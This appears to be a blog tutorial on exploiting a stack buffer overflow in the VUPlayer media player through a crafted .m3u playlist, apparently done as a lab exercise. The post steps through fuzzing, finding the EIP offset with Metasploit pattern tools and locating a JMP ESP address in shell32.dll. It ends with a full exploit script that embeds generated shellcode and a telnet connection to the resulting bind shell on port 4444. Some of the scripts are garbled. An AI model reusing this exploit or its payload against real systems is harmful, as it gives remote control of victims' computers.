A. Try
- I try make fuzzer with format file .vpl
#!usr/bin/python
filename="error.vpl"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()
- run file python in terminal to make new file
- run VUPlayer and load fuzzer with format file .vpl, aplication not crash and try buffer * until 2000 VUPlayer not crash too.
- I try make fuzzer with format file .m3u
#!usr/bin/python
filename="error.m3u"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()
- run fuzzer in terminal to make new file .m3u.
- run VUPlayer and load with fuzzer with format file .m3u same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
- I try again make fuzzer with format file .pls.
#!usr/bin/python
filename="error.pls"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()
- run fuzzer in terminal to make file .pls
- run VUPlayaer again and load result fuzzer with format file .pls same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
- I try again make fuzzer with format .asx
#!usr/bin/python
filename="error.asx”
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()
- run fuzzer in teminal to make file .asx
- run VUPlayer again and load result fuzzer with format file .asx same aplication not crash. I try change buffer math until 2000 but also not crash.
- I try again make fuzzer with format .wax.
#!usr/bin/python
filename="error.wax"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()
- run fuzzer in terminal to make file.wax
- run VUPlayaer again and load result fuzzer with format file .pls same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
- Make fuzzer with python language the useful make format file .cue.
#!usr/bin/python
filename="error.cue"
buffer="\x41" * 1000
file=open(filename,'w')
file.write(buffer)
file.close()
- run fuzzer on terminal to make file .cue
- run VUPlayer again and load result fuzzer with format file .asx same aplication not crash. I try change buffer math until 2000 but also not crash.
I try make result this case make way to
buffer format file .m3u, .pls, .wax, but I choses format file is
.m3u.
B. Show Process Debbugging
- run aplication UVPlayer in Ollydbg for see the process and analisys the memory.
- make dummies data structur with pattern create-open terminal and type the terminal :root@bt:~# cd /pentest/exploits/framework/tools/root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2000 > error.txt
-type in terminal : #kwrite error.txt
case talked about the function show
dummies string structure.
-copy and paste value error.txt and
modifiying the fuzzer
#!usr/bin/python
filename="error1.m3u"
buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"
#buffer+="\x41" * 2000
file=open(filename,'w')
file.write(buffer)
file.close()
- run fuzzer after modification on terminal
- run UVPlayer on Ollydbg and load fuzzer modification and attention ESP memory and EIP memory.
- count byte from pattern collection- type on terminal :root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 684237681012
in the case, EIP address at UVPlayer
can overwrite is 1023,1024,1025 and 1016 because EIP address 4 byte
only.
root@bt:/pentest/exploits/framework/tools#
./pattern_offset.rb 8Bh9Bi
1016
- proof the address EIP-modification the fuzzer#! usr/bin/pythonfilename="error2.m3u"buffer="\x90" * 1012buffer+="\xEF\xBE\xAD\xDE"file=open(filename,'w')file.write(buffer)file.close()
- run UVPlayer on Ollydbg and load fuzzer
- proof the ESP address- modification fuzzer#! usr/bin/pythonfilename="error3.m3u"buffer+="\x90" * 1012buffer+="\xEF\xBE\xAD\xDE"buffer+="\x90" * (1016-len(buffer))buffer+="\xCC" * (2000-len(buffer))file=open(filename,'w')file.write(buffer)file.close()
- run UVPlayer again on Ollydbg and load the fuzzer
- JMP ESP1. search JMP ESP- run VUPlayer on Ollydbg, click View menu chose menu executable modules. In Executable modules window, I chose with method double click shell32.dll. Show new window shell32.dll and click right main window → search for -->Command and type JMP ESP then press Find buttom.
- proof JMP ESP- modification fuzzer
#! usr/bin/python
filename="error4.m3u"
buffer="\x90" * 1012
buffer+="\xD7\x30\x9D\x7C"
buffer+="\xCC" *
(1016-len(buffer))
buffer+="\xCC" *
(2000-len(buffer))
file=open(filename,'w')
file.write(buffer)
file.close()
- run aplication on Ollydbg and load fuzzer after modification
- Payload1. make payload- run metasploit2 GUI in terminal, type :root@bt:~# cd /pentest/exploits/framework2/root@bt:/pentest/exploits/framework2# ./msfweb+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)
- filter modules payload
- chose payload modules
- generate payload
- modification fuzzer- copy and paste result generate payload from msfweb#! usr/bin/pythonfilename="error5.m3u"buffer="\x90" * 1012buffer+="\xD7\x30\x9D\x7C"buffer+="\x90" * 32buffer+=("\xda\xd8\xbf\x29\xf7\x72\x58\x31\xc9\xd9\x74\x24\xf4\x58\xb1\x51""\x83\xc0\x04\x31\x78\x13\x03\x51\xe4\x90\xad\x5d\x60\xbe\x03\x75""\x8c\xbf\x63\x7a\x0f\xcb\xf0\xa0\xf4\x40\x4d\x94\x7f\x2a\x4b\x9c""\x7e\x3c\xd8\x13\x99\x49\x80\x8b\x98\xa6\x76\x40\xae\xb3\x88\xb8""\xfe\x03\x13\xe8\x85\x44\x50\xf7\x44\x8e\x94\xf6\x84\xe4\x53\xc3""\x5c\xdf\xb3\x46\xb8\x94\x9b\x8c\x43\x40\x45\x47\x4f\xdd\x01\x08""\x4c\xe0\xfe\xb5\x40\x69\x89\xd5\xbc\x71\xeb\xe6\x8c\x52\x8f\x63""\xad\x54\xdb\x33\x3e\x1e\xab\xaf\x93\xab\x0c\xc7\xb5\xc3\x02\x99""\x47\xf8\x4b\xda\x8e\x66\x3f\x42\x47\x54\x8d\xe2\xe0\xe9\xc3\xad""\x5a\xf1\xf4\x39\xa8\xe0\x09\x82\x7e\x04\x27\xab\xf7\x1f\xae\xd2""\xe5\xe8\x2d\x81\x9f\xea\xce\xf9\x08\x32\x39\x0c\x65\x93\xc5\x38""\x25\x4f\x69\x97\x99\x2c\xde\x54\x4d\x4c\x30\x3c\x19\xa3\xed\xa6""\x8a\x4a\xec\xb3\x45\xe9\xf5\xcb\x52\xa6\xf6\xfd\x37\x59\x58\x54""\x37\x89\x32\xf2\x6a\x04\x2a\xad\x8b\x8f\xff\x04\x8b\xe0\x68\x43""\x3a\x87\x20\xdc\x42\x51\xe2\xb6\xe8\x0b\xfc\xe6\x82\xdc\xe5\x7f""\x63\x65\xbd\x80\xbd\xc3\xbe\xae\x24\x86\x24\x28\xc1\x35\xc8\x3d""\xf4\xd0\x42\x64\xde\xe8\xea\x71\x4a\xb5\x65\x9f\xba\xf5\x85\xf5""\x43\xb7\x44\xf7\xfe\x14\x04\x8a\x85\x5c\x81\x3f\xd2\xf5\xa7\xc1""\x96\x10\xb7\x48\x9d\xe3\x91\xe9\x4a\x4e\x4f\x5c\x24\x04\x6e\x0f""\x97\x8d\x21\x50\xc7\x46\x6f\x77\xed\x58\x3c\x78\x38\x0e\x3c\x79""\xf2\x30\x12\x0e\xaa\x32\x10\xd4\x31\x34\xc1\x86\x46\x1a\x86\x58""\x61\x79\x24\xf7\x6e\xa8\x34\x27")file=open(filename,'w')file.write(buffer)file.close()
- run VUPlayer not Ollydbg and load fuzzer
- run terminal on backtrack and connection, type :root@bt:~# telnet 192.168.56.101 4444
======GOOD LUCK========
Tidak ada komentar:
Posting Komentar